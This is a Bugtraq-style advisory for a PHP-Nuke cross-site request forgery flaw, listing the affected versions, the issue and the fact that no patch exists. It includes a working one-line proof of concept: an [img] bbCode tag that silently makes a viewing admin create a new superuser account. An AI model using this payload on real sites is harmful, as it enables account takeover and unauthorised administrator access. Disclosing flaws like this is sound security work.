PHP-Nuke Image Tag Admin Command Execution Vulnerability
BID:9895
Info
PHP-Nuke Image Tag Admin Command Execution Vulnerability
| Bugtraq ID: | 9895 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 16 2004 12:00AM |
| Updated: | Mar 16 2004 12:00AM |
| Credit: | Disclosure of this issue is credited to Janek Vind <[email protected]>. |
| Vulnerable: |
Francisco Burzi PHP-Nuke 7.1 Francisco Burzi PHP-Nuke 7.0 FINAL Francisco Burzi PHP-Nuke 7.0 Francisco Burzi PHP-Nuke 6.9 Francisco Burzi PHP-Nuke 6.7 Francisco Burzi PHP-Nuke 6.6 Francisco Burzi PHP-Nuke 6.5 RC3 Francisco Burzi PHP-Nuke 6.5 RC2 Francisco Burzi PHP-Nuke 6.5 RC1 Francisco Burzi PHP-Nuke 6.5 FINAL Francisco Burzi PHP-Nuke 6.5 BETA 1 Francisco Burzi PHP-Nuke 6.5 Francisco Burzi PHP-Nuke 6.0 |
| Not Vulnerable: | |
Discussion
PHP-Nuke Image Tag Admin Command Execution Vulnerability
It has been reported that PHP-Nuke is prone to a remote admin command execution vulnerability. This issue is due to a design error that allows an attacker to specify arbitrary URI values in bbCode tags contained within posts.
This issue may be leveraged to force an admin user viewing a malicious post to perform some query to the affected application such as adding a user or removing arbitrary data from the database.
It has been reported that PHP-Nuke is prone to a remote admin command execution vulnerability. This issue is due to a design error that allows an attacker to specify arbitrary URI values in bbCode tags contained within posts.
This issue may be leveraged to force an admin user viewing a malicious post to perform some query to the affected application such as adding a user or removing arbitrary data from the database.
Exploit / POC
PHP-Nuke Image Tag Admin Command Execution Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:
The following URI, when inserted between the '[img]' tags and viewed by an admin user will cause the creation of a new admin user:
[img]http://www.example.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&[email protected]&add_radminsuper=1[/img]
No exploit is required to leverage this issue. The following proof of concept has been provided:
The following URI, when inserted between the '[img]' tags and viewed by an admin user will cause the creation of a new admin user:
[img]http://www.example.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&[email protected]&add_radminsuper=1[/img]
Solution / Fix
PHP-Nuke Image Tag Admin Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PHP-Nuke Image Tag Admin Command Execution Vulnerability
References:
References:
- PHPNuke INP Homepage (PHPNuke INP)